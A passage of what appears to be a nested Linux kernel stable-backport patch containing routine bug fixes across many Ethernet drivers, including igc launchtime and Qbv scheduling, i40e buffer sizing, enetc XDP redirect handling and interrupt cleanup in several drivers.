++	} else if (sfp_base[XGBE_SFP_BASE_CABLE] & XGBE_SFP_BASE_CABLE_ACTIVE) {
+ 		phy_data->sfp_cable = XGBE_SFP_CABLE_ACTIVE;
++	} else {
++		phy_data->sfp_cable = XGBE_SFP_CABLE_FIBER;
+ 	}
+ 
+ 	/* Determine the type of SFP */
+-	if (phy_data->sfp_cable == XGBE_SFP_CABLE_PASSIVE &&
++	if (phy_data->sfp_cable != XGBE_SFP_CABLE_FIBER &&
+ 	    xgbe_phy_sfp_bit_rate(sfp_eeprom, XGBE_SFP_SPEED_10000))
+ 		phy_data->sfp_base = XGBE_SFP_BASE_10000_CR;
+ 	else if (sfp_base[XGBE_SFP_BASE_10GBE_CC] & XGBE_SFP_BASE_10GBE_CC_SR)
+diff --git a/drivers/net/ethernet/apple/bmac.c b/drivers/net/ethernet/apple/bmac.c
+index 334de0d93c899..9e653e2925f78 100644
+--- a/drivers/net/ethernet/apple/bmac.c
++++ b/drivers/net/ethernet/apple/bmac.c
+@@ -1510,7 +1510,7 @@ static void bmac_tx_timeout(struct timer_list *t)
+ 	i = bp->tx_empty;
+ 	++dev->stats.tx_errors;
+ 	if (i != bp->tx_fill) {
+-		dev_kfree_skb(bp->tx_bufs[i]);
++		dev_kfree_skb_irq(bp->tx_bufs[i]);
+ 		bp->tx_bufs[i] = NULL;
+ 		if (++i >= N_TX_RING) i = 0;
+ 		bp->tx_empty = i;
+diff --git a/drivers/net/ethernet/apple/mace.c b/drivers/net/ethernet/apple/mace.c
+index d0a771b65e888..fd1b008b7208c 100644
+--- a/drivers/net/ethernet/apple/mace.c
++++ b/drivers/net/ethernet/apple/mace.c
+@@ -846,7 +846,7 @@ static void mace_tx_timeout(struct timer_list *t)
+     if (mp->tx_bad_runt) {
+ 	mp->tx_bad_runt = 0;
+     } else if (i != mp->tx_fill) {
+-	dev_kfree_skb(mp->tx_bufs[i]);
++	dev_kfree_skb_irq(mp->tx_bufs[i]);
+ 	if (++i >= N_TX_RING)
+ 	    i = 0;
+ 	mp->tx_empty = i;
+diff --git a/drivers/net/ethernet/broadcom/bnx2.c b/drivers/net/ethernet/broadcom/bnx2.c
+index fec57f1982c86..dbe3101447804 100644
+--- a/drivers/net/ethernet/broadcom/bnx2.c
++++ b/drivers/net/ethernet/broadcom/bnx2.c
+@@ -5415,8 +5415,9 @@ bnx2_set_rx_ring_size(struct bnx2 *bp, u32 size)
+ 
+ 	bp->rx_buf_use_size = rx_size;
+ 	/* hw alignment + build_skb() overhead*/
+-	bp->rx_buf_size = SKB_DATA_ALIGN(bp->rx_buf_use_size + BNX2_RX_ALIGN) +
+-		NET_SKB_PAD + SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	bp->rx_buf_size = kmalloc_size_roundup(
++		SKB_DATA_ALIGN(bp->rx_buf_use_size + BNX2_RX_ALIGN) +
++		NET_SKB_PAD + SKB_DATA_ALIGN(sizeof(struct skb_shared_info)));
+ 	bp->rx_jumbo_thresh = rx_size - BNX2_RX_OFFSET;
+ 	bp->rx_ring_size = size;
+ 	bp->rx_max_ring = bnx2_find_max_ring(size, BNX2_MAX_RX_RINGS);
+diff --git a/drivers/net/ethernet/dnet.c b/drivers/net/ethernet/dnet.c
+index 08184f20f5104..151ca9573be97 100644
+--- a/drivers/net/ethernet/dnet.c
++++ b/drivers/net/ethernet/dnet.c
+@@ -550,11 +550,11 @@ static netdev_tx_t dnet_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ 
+ 	skb_tx_timestamp(skb);
+ 
++	spin_unlock_irqrestore(&bp->lock, flags);
++
+ 	/* free the buffer */
+ 	dev_kfree_skb(skb);
+ 
+-	spin_unlock_irqrestore(&bp->lock, flags);
+-
+ 	return NETDEV_TX_OK;
+ }
+ 
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc.c b/drivers/net/ethernet/freescale/enetc/enetc.c
+index 8671591cb7501..3a79ead5219ae 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc.c
+@@ -1489,23 +1489,6 @@ static void enetc_xdp_drop(struct enetc_bdr *rx_ring, int rx_ring_first,
+ 	rx_ring->stats.xdp_drops++;
+ }
+ 
+-static void enetc_xdp_free(struct enetc_bdr *rx_ring, int rx_ring_first,
+-			   int rx_ring_last)
+-{
+-	while (rx_ring_first != rx_ring_last) {
+-		struct enetc_rx_swbd *rx_swbd = &rx_ring->rx_swbd[rx_ring_first];
+-
+-		if (rx_swbd->page) {
+-			dma_unmap_page(rx_ring->dev, rx_swbd->dma, PAGE_SIZE,
+-				       rx_swbd->dir);
+-			__free_page(rx_swbd->page);
+-			rx_swbd->page = NULL;
+-		}
+-		enetc_bdr_idx_inc(rx_ring, &rx_ring_first);
+-	}
+-	rx_ring->stats.xdp_redirect_failures++;
+-}
+-
+ static int enetc_clean_rx_ring_xdp(struct enetc_bdr *rx_ring,
+ 				   struct napi_struct *napi, int work_limit,
+ 				   struct bpf_prog *prog)
+@@ -1527,8 +1510,8 @@ static int enetc_clean_rx_ring_xdp(struct enetc_bdr *rx_ring,
+ 		int orig_i, orig_cleaned_cnt;
+ 		struct xdp_buff xdp_buff;
+ 		struct sk_buff *skb;
+-		int tmp_orig_i, err;
+ 		u32 bd_status;
++		int err;
+ 
+ 		rxbd = enetc_rxbd(rx_ring, i);
+ 		bd_status = le32_to_cpu(rxbd->r.lstatus);
+@@ -1615,18 +1598,16 @@ static int enetc_clean_rx_ring_xdp(struct enetc_bdr *rx_ring,
+ 				break;
+ 			}
+ 
+-			tmp_orig_i = orig_i;
+-
+-			while (orig_i != i) {
+-				enetc_flip_rx_buff(rx_ring,
+-						   &rx_ring->rx_swbd[orig_i]);
+-				enetc_bdr_idx_inc(rx_ring, &orig_i);
+-			}
+-
+ 			err = xdp_do_redirect(rx_ring->ndev, &xdp_buff, prog);
+ 			if (unlikely(err)) {
+-				enetc_xdp_free(rx_ring, tmp_orig_i, i);
++				enetc_xdp_drop(rx_ring, orig_i, i);
++				rx_ring->stats.xdp_redirect_failures++;
+ 			} else {
++				while (orig_i != i) {
++					enetc_flip_rx_buff(rx_ring,
++							   &rx_ring->rx_swbd[orig_i]);
++					enetc_bdr_idx_inc(rx_ring, &orig_i);
++				}
+ 				xdp_redirect_frm_cnt++;
+ 				rx_ring->stats.xdp_redirect++;
+ 			}
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 23e1a94b9ce45..f250b0df27fbb 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -1642,6 +1642,14 @@ fec_enet_rx_queue(struct net_device *ndev, int budget, u16 queue_id)
+ 		 * bridging applications.
+ 		 */
+ 		skb = build_skb(page_address(page), PAGE_SIZE);
++		if (unlikely(!skb)) {
++			page_pool_recycle_direct(rxq->page_pool, page);
++			ndev->stats.rx_dropped++;
++
++			netdev_err_once(ndev, "build_skb failed!\n");
++			goto rx_processing_done;
++		}
++
+ 		skb_reserve(skb, FEC_ENET_XDP_HEADROOM);
+ 		skb_put(skb, pkt_len - 4);
+ 		skb_mark_for_recycle(skb);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 6416322d7c18b..e6e349f0c9457 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -3693,6 +3693,24 @@ static int i40e_vsi_configure_tx(struct i40e_vsi *vsi)
+ 	return err;
+ }
+ 
++/**
++ * i40e_calculate_vsi_rx_buf_len - Calculates buffer length
++ *
++ * @vsi: VSI to calculate rx_buf_len from
++ */
++static u16 i40e_calculate_vsi_rx_buf_len(struct i40e_vsi *vsi)
++{
++	if (!vsi->netdev || (vsi->back->flags & I40E_FLAG_LEGACY_RX))
++		return I40E_RXBUFFER_2048;
++
++#if (PAGE_SIZE < 8192)
++	if (!I40E_2K_TOO_SMALL_WITH_PADDING && vsi->netdev->mtu <= ETH_DATA_LEN)
++		return I40E_RXBUFFER_1536 - NET_IP_ALIGN;
++#endif
++
++	return PAGE_SIZE < 8192 ? I40E_RXBUFFER_3072 : I40E_RXBUFFER_2048;
++}
++
+ /**
+  * i40e_vsi_configure_rx - Configure the VSI for Rx
+  * @vsi: the VSI being configured
+@@ -3704,20 +3722,14 @@ static int i40e_vsi_configure_rx(struct i40e_vsi *vsi)
+ 	int err = 0;
+ 	u16 i;
+ 
+-	if (!vsi->netdev || (vsi->back->flags & I40E_FLAG_LEGACY_RX)) {
+-		vsi->max_frame = I40E_MAX_RXBUFFER;
+-		vsi->rx_buf_len = I40E_RXBUFFER_2048;
++	vsi->max_frame = I40E_MAX_RXBUFFER;
++	vsi->rx_buf_len = i40e_calculate_vsi_rx_buf_len(vsi);
++
+ #if (PAGE_SIZE < 8192)
+-	} else if (!I40E_2K_TOO_SMALL_WITH_PADDING &&
+-		   (vsi->netdev->mtu <= ETH_DATA_LEN)) {
++	if (vsi->netdev && !I40E_2K_TOO_SMALL_WITH_PADDING &&
++	    vsi->netdev->mtu <= ETH_DATA_LEN)
+ 		vsi->max_frame = I40E_RXBUFFER_1536 - NET_IP_ALIGN;
+-		vsi->rx_buf_len = I40E_RXBUFFER_1536 - NET_IP_ALIGN;
+ #endif
+-	} else {
+-		vsi->max_frame = I40E_MAX_RXBUFFER;
+-		vsi->rx_buf_len = (PAGE_SIZE < 8192) ? I40E_RXBUFFER_3072 :
+-						       I40E_RXBUFFER_2048;
+-	}
+ 
+ 	/* set up individual rings */
+ 	for (i = 0; i < vsi->num_queue_pairs && !err; i++)
+@@ -13282,7 +13294,7 @@ static int i40e_xdp_setup(struct i40e_vsi *vsi, struct bpf_prog *prog,
+ 	int i;
+ 
+ 	/* Don't allow frames that span over multiple buffers */
+-	if (frame_size > vsi->rx_buf_len) {
++	if (frame_size > i40e_calculate_vsi_rx_buf_len(vsi)) {
+ 		NL_SET_ERR_MSG_MOD(extack, "MTU too large to enable XDP");
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c
+index 0f668468d1414..53fec5bbe6e00 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp.c
++++ b/drivers/net/ethernet/intel/ice/ice_ptp.c
+@@ -639,7 +639,7 @@ static u64 ice_ptp_extend_40b_ts(struct ice_pf *pf, u64 in_tstamp)
+ static bool ice_ptp_tx_tstamp(struct ice_ptp_tx *tx)
+ {
+ 	struct ice_ptp_port *ptp_port;
+-	bool ts_handled = true;
++	bool more_timestamps;
+ 	struct ice_pf *pf;
+ 	u8 idx;
+ 
+@@ -701,11 +701,10 @@ static bool ice_ptp_tx_tstamp(struct ice_ptp_tx *tx)
+ 	 * poll for remaining timestamps.
+ 	 */
+ 	spin_lock(&tx->lock);
+-	if (!bitmap_empty(tx->in_use, tx->len))
+-		ts_handled = false;
++	more_timestamps = tx->init && !bitmap_empty(tx->in_use, tx->len);
+ 	spin_unlock(&tx->lock);
+ 
+-	return ts_handled;
++	return !more_timestamps;
+ }
+ 
+ /**
+@@ -776,6 +775,9 @@ ice_ptp_release_tx_tracker(struct ice_pf *pf, struct ice_ptp_tx *tx)
+ {
+ 	tx->init = 0;
+ 
++	/* wait for potentially outstanding interrupt to complete */
++	synchronize_irq(pf->msix_entries[pf->oicr_idx].vector);
++
+ 	ice_ptp_flush_tx_tracker(pf, tx);
+ 
+ 	kfree(tx->tstamps);
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 473158c09f1d7..24a6ae19ad8ed 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -1202,8 +1202,12 @@ static int igb_alloc_q_vector(struct igb_adapter *adapter,
+ 	if (!q_vector) {
+ 		q_vector = kzalloc(size, GFP_KERNEL);
+ 	} else if (size > ksize(q_vector)) {
+-		kfree_rcu(q_vector, rcu);
+-		q_vector = kzalloc(size, GFP_KERNEL);
++		struct igb_q_vector *new_q_vector;
++
++		new_q_vector = kzalloc(size, GFP_KERNEL);
++		if (new_q_vector)
++			kfree_rcu(q_vector, rcu);
++		q_vector = new_q_vector;
+ 	} else {
+ 		memset(q_vector, 0, size);
+ 	}
+diff --git a/drivers/net/ethernet/intel/igc/igc.h b/drivers/net/ethernet/intel/igc/igc.h
+index 1e7e7071f64d2..df3e26c0cf01a 100644
+--- a/drivers/net/ethernet/intel/igc/igc.h
++++ b/drivers/net/ethernet/intel/igc/igc.h
+@@ -94,6 +94,8 @@ struct igc_ring {
+ 	u8 queue_index;                 /* logical index of the ring*/
+ 	u8 reg_idx;                     /* physical index of the ring */
+ 	bool launchtime_enable;         /* true if LaunchTime is enabled */
++	ktime_t last_tx_cycle;          /* end of the cycle with a launchtime transmission */
++	ktime_t last_ff_cycle;          /* Last cycle with an active first flag */
+ 
+ 	u32 start_time;
+ 	u32 end_time;
+@@ -182,6 +184,7 @@ struct igc_adapter {
+ 
+ 	ktime_t base_time;
+ 	ktime_t cycle_time;
++	bool qbv_enable;
+ 
+ 	/* OS defined structs */
+ 	struct pci_dev *pdev;
+diff --git a/drivers/net/ethernet/intel/igc/igc_defines.h b/drivers/net/ethernet/intel/igc/igc_defines.h
+index 4f9d7f013a958..4ad35fbdc02e8 100644
+--- a/drivers/net/ethernet/intel/igc/igc_defines.h
++++ b/drivers/net/ethernet/intel/igc/igc_defines.h
+@@ -321,6 +321,8 @@
+ #define IGC_ADVTXD_L4LEN_SHIFT	8  /* Adv ctxt L4LEN shift */
+ #define IGC_ADVTXD_MSS_SHIFT	16 /* Adv ctxt MSS shift */
+ 
++#define IGC_ADVTXD_TSN_CNTX_FIRST	0x00000080
++
+ /* Transmit Control */
+ #define IGC_TCTL_EN		0x00000002 /* enable Tx */
+ #define IGC_TCTL_PSP		0x00000008 /* pad short packets */
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 34889be63e788..34db1c006b20a 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -1000,25 +1000,118 @@ static int igc_write_mc_addr_list(struct net_device *netdev)
+ 	return netdev_mc_count(netdev);
+ }
+ 
+-static __le32 igc_tx_launchtime(struct igc_adapter *adapter, ktime_t txtime)
++static __le32 igc_tx_launchtime(struct igc_ring *ring, ktime_t txtime,
++				bool *first_flag, bool *insert_empty)
+ {
++	struct igc_adapter *adapter = netdev_priv(ring->netdev);
+ 	ktime_t cycle_time = adapter->cycle_time;
+ 	ktime_t base_time = adapter->base_time;
++	ktime_t now = ktime_get_clocktai();
++	ktime_t baset_est, end_of_cycle;
+ 	u32 launchtime;
++	s64 n;
+ 
+-	/* FIXME: when using ETF together with taprio, we may have a
+-	 * case where 'delta' is larger than the cycle_time, this may
+-	 * cause problems if we don't read the current value of
+-	 * IGC_BASET, as the value writen into the launchtime
+-	 * descriptor field may be misinterpreted.
++	n = div64_s64(ktime_sub_ns(now, base_time), cycle_time);
++
++	baset_est = ktime_add_ns(base_time, cycle_time * (n));
++	end_of_cycle = ktime_add_ns(baset_est, cycle_time);
++
++	if (ktime_compare(txtime, end_of_cycle) >= 0) {
++		if (baset_est != ring->last_ff_cycle) {
++			*first_flag = true;
++			ring->last_ff_cycle = baset_est;
++
++			if (ktime_compare(txtime, ring->last_tx_cycle) > 0)
++				*insert_empty = true;
++		}
++	}
++
++	/* Introduce a window at the end of the cycle in which packets
++	 * may not honor their launchtime. A window of 5us is chosen to
++	 * account for the software updating the tail pointer and the
++	 * packets being DMA'ed to the packet buffer.
++	 */
+-	div_s64_rem(ktime_sub_ns(txtime, base_time), cycle_time, &launchtime);
++	if ((ktime_sub_ns(end_of_cycle, now) < 5 * NSEC_PER_USEC))
++		netdev_warn(ring->netdev, "Packet with txtime=%llu may not be honoured\n",
++			    txtime);
++
++	ring->last_tx_cycle = end_of_cycle;
++
++	launchtime = ktime_sub_ns(txtime, baset_est);
++	if (launchtime > 0)
++		div_s64_rem(launchtime, cycle_time, &launchtime);
++	else
++		launchtime = 0;
+ 
+ 	return cpu_to_le32(launchtime);
+ }
+ 
++static int igc_init_empty_frame(struct igc_ring *ring,
++				struct igc_tx_buffer *buffer,
++				struct sk_buff *skb)
++{
++	unsigned int size;
++	dma_addr_t dma;
++
++	size = skb_headlen(skb);
++
++	dma = dma_map_single(ring->dev, skb->data, size, DMA_TO_DEVICE);
++	if (dma_mapping_error(ring->dev, dma)) {
++		netdev_err_once(ring->netdev, "Failed to map DMA for TX\n");
++		return -ENOMEM;
++	}
++
++	buffer->skb = skb;
++	buffer->protocol = 0;
++	buffer->bytecount = skb->len;
++	buffer->gso_segs = 1;
++	buffer->time_stamp = jiffies;
++	dma_unmap_len_set(buffer, len, skb->len);
++	dma_unmap_addr_set(buffer, dma, dma);
++
++	return 0;
++}
++
++static int igc_init_tx_empty_descriptor(struct igc_ring *ring,
++					struct sk_buff *skb,
++					struct igc_tx_buffer *first)
++{
++	union igc_adv_tx_desc *desc;
++	u32 cmd_type, olinfo_status;
++	int err;
++
++	if (!igc_desc_unused(ring))
++		return -EBUSY;
++
++	err = igc_init_empty_frame(ring, first, skb);
++	if (err)
++		return err;
++
++	cmd_type = IGC_ADVTXD_DTYP_DATA | IGC_ADVTXD_DCMD_DEXT |
++		   IGC_ADVTXD_DCMD_IFCS | IGC_TXD_DCMD |
++		   first->bytecount;
++	olinfo_status = first->bytecount << IGC_ADVTXD_PAYLEN_SHIFT;
++
++	desc = IGC_TX_DESC(ring, ring->next_to_use);
++	desc->read.cmd_type_len = cpu_to_le32(cmd_type);
++	desc->read.olinfo_status = cpu_to_le32(olinfo_status);
++	desc->read.buffer_addr = cpu_to_le64(dma_unmap_addr(first, dma));
++
++	netdev_tx_sent_queue(txring_txq(ring), skb->len);
++
++	first->next_to_watch = desc;
++
++	ring->next_to_use++;
++	if (ring->next_to_use == ring->count)
++		ring->next_to_use = 0;
++
++	return 0;
++}
++
++#define IGC_EMPTY_FRAME_SIZE 60
++
+ static void igc_tx_ctxtdesc(struct igc_ring *tx_ring,
+-			    struct igc_tx_buffer *first,
++			    __le32 launch_time, bool first_flag,
+ 			    u32 vlan_macip_lens, u32 type_tucmd,
+ 			    u32 mss_l4len_idx)
+ {
+@@ -1037,26 +1130,17 @@ static void igc_tx_ctxtdesc(struct igc_ring *tx_ring,
+ 	if (test_bit(IGC_RING_FLAG_TX_CTX_IDX, &tx_ring->flags))
+ 		mss_l4len_idx |= tx_ring->reg_idx << 4;
+ 
++	if (first_flag)
++		mss_l4len_idx |= IGC_ADVTXD_TSN_CNTX_FIRST;
++
+ 	context_desc->vlan_macip_lens	= cpu_to_le32(vlan_macip_lens);
+ 	context_desc->type_tucmd_mlhl	= cpu_to_le32(type_tucmd);
+ 	context_desc->mss_l4len_idx	= cpu_to_le32(mss_l4len_idx);
+-
+-	/* We assume there is always a valid Tx time available. Invalid times
+-	 * should have been handled by the upper layers.
+-	 */
+-	if (tx_ring->launchtime_enable) {
+-		struct igc_adapter *adapter = netdev_priv(tx_ring->netdev);
+-		ktime_t txtime = first->skb->tstamp;
+-
+-		skb_txtime_consumed(first->skb);
+-		context_desc->launch_time = igc_tx_launchtime(adapter,
+-							      txtime);
+-	} else {
+-		context_desc->launch_time = 0;
+-	}
++	context_desc->launch_time	= launch_time;
+ }
+ 
+-static void igc_tx_csum(struct igc_ring *tx_ring, struct igc_tx_buffer *first)
++static void igc_tx_csum(struct igc_ring *tx_ring, struct igc_tx_buffer *first,
++			__le32 launch_time, bool first_flag)
+ {
+ 	struct sk_buff *skb = first->skb;
+ 	u32 vlan_macip_lens = 0;
+@@ -1096,7 +1180,8 @@ no_csum:
+ 	vlan_macip_lens |= skb_network_offset(skb) << IGC_ADVTXD_MACLEN_SHIFT;
+ 	vlan_macip_lens |= first->tx_flags & IGC_TX_FLAGS_VLAN_MASK;
+ 
+-	igc_tx_ctxtdesc(tx_ring, first, vlan_macip_lens, type_tucmd, 0);
++	igc_tx_ctxtdesc(tx_ring, launch_time, first_flag,
++			vlan_macip_lens, type_tucmd, 0);
+ }
+ 
+ static int __igc_maybe_stop_tx(struct igc_ring *tx_ring, const u16 size)
+@@ -1320,6 +1405,7 @@ dma_error:
+ 
+ static int igc_tso(struct igc_ring *tx_ring,
+ 		   struct igc_tx_buffer *first,
++		   __le32 launch_time, bool first_flag,
+ 		   u8 *hdr_len)
+ {
+ 	u32 vlan_macip_lens, type_tucmd, mss_l4len_idx;
+@@ -1406,8 +1492,8 @@ static int igc_tso(struct igc_ring *tx_ring,
+ 	vlan_macip_lens |= (ip.hdr - skb->data) << IGC_ADVTXD_MACLEN_SHIFT;
+ 	vlan_macip_lens |= first->tx_flags & IGC_TX_FLAGS_VLAN_MASK;
+ 
+-	igc_tx_ctxtdesc(tx_ring, first, vlan_macip_lens,
+-			type_tucmd, mss_l4len_idx);
++	igc_tx_ctxtdesc(tx_ring, launch_time, first_flag,
++			vlan_macip_lens, type_tucmd, mss_l4len_idx);
+ 
+ 	return 1;
+ }
+@@ -1415,11 +1501,14 @@ static int igc_tso(struct igc_ring *tx_ring,
+ static netdev_tx_t igc_xmit_frame_ring(struct sk_buff *skb,
+ 				       struct igc_ring *tx_ring)
+ {
++	bool first_flag = false, insert_empty = false;
+ 	u16 count = TXD_USE_COUNT(skb_headlen(skb));
+ 	__be16 protocol = vlan_get_protocol(skb);
+ 	struct igc_tx_buffer *first;
++	__le32 launch_time = 0;
+ 	u32 tx_flags = 0;
+ 	unsigned short f;
++	ktime_t txtime;
+ 	u8 hdr_len = 0;
+ 	int tso = 0;
+ 
+@@ -1433,11 +1522,40 @@ static netdev_tx_t igc_xmit_frame_ring(struct sk_buff *skb,
+ 		count += TXD_USE_COUNT(skb_frag_size(
+ 						&skb_shinfo(skb)->frags[f]));
+ 
+-	if (igc_maybe_stop_tx(tx_ring, count + 3)) {
++	if (igc_maybe_stop_tx(tx_ring, count + 5)) {
+ 		/* this is a hard error */
+ 		return NETDEV_TX_BUSY;
+ 	}
+ 
++	if (!tx_ring->launchtime_enable)
++		goto done;
++
++	txtime = skb->tstamp;
++	skb->tstamp = ktime_set(0, 0);
++	launch_time = igc_tx_launchtime(tx_ring, txtime, &first_flag, &insert_empty);
++
++	if (insert_empty) {
++		struct igc_tx_buffer *empty_info;
++		struct sk_buff *empty;
++		void *data;
++
++		empty_info = &tx_ring->tx_buffer_info[tx_ring->next_to_use];
++		empty = alloc_skb(IGC_EMPTY_FRAME_SIZE, GFP_ATOMIC);
++		if (!empty)
++			goto done;
++
++		data = skb_put(empty, IGC_EMPTY_FRAME_SIZE);
++		memset(data, 0, IGC_EMPTY_FRAME_SIZE);
++
++		igc_tx_ctxtdesc(tx_ring, 0, false, 0, 0, 0);
++
++		if (igc_init_tx_empty_descriptor(tx_ring,
++						 empty,
++						 empty_info) < 0)
++			dev_kfree_skb_any(empty);
++	}
++
++done:
+ 	/* record the location of the first descriptor for this packet */
+ 	first = &tx_ring->tx_buffer_info[tx_ring->next_to_use];
+ 	first->type = IGC_TX_BUFFER_TYPE_SKB;
+@@ -1474,11 +1592,11 @@ static netdev_tx_t igc_xmit_frame_ring(struct sk_buff *skb,
+ 	first->tx_flags = tx_flags;
+ 	first->protocol = protocol;
+ 
+-	tso = igc_tso(tx_ring, first, &hdr_len);
++	tso = igc_tso(tx_ring, first, launch_time, first_flag, &hdr_len);
+ 	if (tso < 0)
+ 		goto out_drop;
+ 	else if (!tso)
+-		igc_tx_csum(tx_ring, first);
++		igc_tx_csum(tx_ring, first, launch_time, first_flag);
+ 
+ 	igc_tx_map(tx_ring, first, hdr_len);
+ 
+@@ -5918,10 +6036,16 @@ static int igc_save_qbv_schedule(struct igc_adapter *adapter,
+ 	bool queue_configured[IGC_MAX_TX_QUEUES] = { };
+ 	u32 start_time = 0, end_time = 0;
+ 	size_t n;
++	int i;
++
++	adapter->qbv_enable = qopt->enable;
+ 
+ 	if (!qopt->enable)
+ 		return igc_tsn_clear_schedule(adapter);
+ 
++	if (qopt->base_time < 0)
++		return -ERANGE;
++
+ 	if (adapter->base_time)
+ 		return -EALREADY;
+ 
+@@ -5933,10 +6057,24 @@ static int igc_save_qbv_schedule(struct igc_adapter *adapter,
+ 
+ 	for (n = 0; n < qopt->num_entries; n++) {
+ 		struct tc_taprio_sched_entry *e = &qopt->entries[n];
+-		int i;
+ 
+ 		end_time += e->interval;
+ 
++		/* If any of the conditions below are true, we need to manually
++		 * control the end time of the cycle.
++		 * 1. Qbv users can specify a cycle time that is not equal
++		 * to the total GCL intervals. Hence, recalculation is
++		 * necessary here to exclude the time interval that
++		 * exceeds the cycle time.
++		 * 2. According to IEEE Std. 802.1Q-2018 section 8.6.9.2,
++		 * once the end of the list is reached, it will switch
++		 * to the END_OF_CYCLE state and leave the gates in the
++		 * same state until the next cycle is started.
++		 */
++		if (end_time > adapter->cycle_time ||
++		    n + 1 == qopt->num_entries)
++			end_time = adapter->cycle_time;
++
+ 		for (i = 0; i < adapter->num_tx_queues; i++) {
+ 			struct igc_ring *ring = adapter->tx_ring[i];
+ 
+@@ -5957,6 +6095,18 @@ static int igc_save_qbv_schedule(struct igc_adapter *adapter,
+ 		start_time += e->interval;
+ 	}
+ 
++	/* Check whether a queue gets configured.
++	 * If not, set both its start and end time to the cycle end time.
++	 */
++	for (i = 0; i < adapter->num_tx_queues; i++) {
++		if (!queue_configured[i]) {
++			struct igc_ring *ring = adapter->tx_ring[i];
++
++			ring->start_time = end_time;
++			ring->end_time = end_time;
++		}
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/igc/igc_tsn.c b/drivers/net/ethernet/intel/igc/igc_tsn.c
+index 0fce22de2ab85..356c7455c5cee 100644
+--- a/drivers/net/ethernet/intel/igc/igc_tsn.c
++++ b/drivers/net/ethernet/intel/igc/igc_tsn.c
+@@ -36,7 +36,7 @@ static unsigned int igc_tsn_new_flags(struct igc_adapter *adapter)
+ {
+ 	unsigned int new_flags = adapter->flags & ~IGC_FLAG_TSN_ANY_ENABLED;
+ 
+-	if (adapter->base_time)
++	if (adapter->qbv_enable)
+ 		new_flags |= IGC_FLAG_TSN_QBV_ENABLED;
+ 
+ 	if (is_any_launchtime(adapter))
+@@ -110,15 +110,8 @@ static int igc_tsn_enable_offload(struct igc_adapter *adapter)
+ 		wr32(IGC_STQT(i), ring->start_time);
+ 		wr32(IGC_ENDQT(i), ring->end_time);
+ 
+-		if (adapter->base_time) {
+-			/* If we have a base_time we are in "taprio"
+-			 * mode and we need to be strict about the
+-			 * cycles: only transmit a packet if it can be
+-			 * completed during that cycle.
+-			 */
+-			txqctl |= IGC_TXQCTL_STRICT_CYCLE |
+-				IGC_TXQCTL_STRICT_END;
+-		}
++		txqctl |= IGC_TXQCTL_STRICT_CYCLE |
++			IGC_TXQCTL_STRICT_END;
+ 
+ 		if (ring->launchtime_enable)
+ 			txqctl |= IGC_TXQCTL_QUEUE_MODE_LAUNCHT;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+index c0bedf402da93..f68a6a0e3aa41 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+@@ -1184,10 +1184,13 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 	mcs->tx_sa_active = alloc_mem(mcs, mcs->hw->sc_entries);
+ 	if (!mcs->tx_sa_active) {
+ 		ret = -ENOMEM;
+-		goto exit;
++		goto free_irq;
+ 	}
+ 
+ 	return ret;
++
++free_irq:
++	free_irq(pci_irq_vector(mcs->pdev, MCS_INT_VEC_IP), mcs);
+ exit:
+ 	pci_free_irq_vectors(mcs->pdev);
+ 	mcs->num_vec = 0;
+@@ -1589,6 +1592,7 @@ static void mcs_remove(struct pci_dev *pdev)
+ 
+ 	/* Set MCS to external bypass */
+ 	mcs_set_external_bypass(mcs, true);
++	free_irq(pci_irq_vector(pdev, MCS_INT_VEC_IP), mcs);
+ 	pci_free_irq_vectors(pdev);
+ 	pci_release_regions(pdev);
+ 	pci_disable_device(pdev);
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 1d36619c5ec91..9aa1892a609c7 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -3229,6 +3229,30 @@ static void mtk_dim_tx(struct work_struct *work)
+ 	dim->state = DIM_START_MEASURE;
+ }
+ 
++static void mtk_set_mcr_max_rx(struct mtk_mac *mac, u32 val)
++{
++	struct mtk_eth *eth = mac->hw;
++	u32 mcr_cur, mcr_new;
++
++	if (MTK_HAS_CAPS(eth->soc->caps, MTK_SOC_MT7628))
++		return;
++
++	mcr_cur = mtk_r32(mac->hw, MTK_MAC_MCR(mac->id));
++	mcr_new = mcr_cur & ~MAC_MCR_MAX_RX_MASK;
++
++	if (val <= 1518)
++		mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_1518);
++	else if (val <= 1536)
++		mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_1536);
++	else if (val <= 1552)
++		mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_1552);
++	else
++		mcr_new |= MAC_MCR_MAX_RX(MAC_MCR_MAX_RX_2048);
++
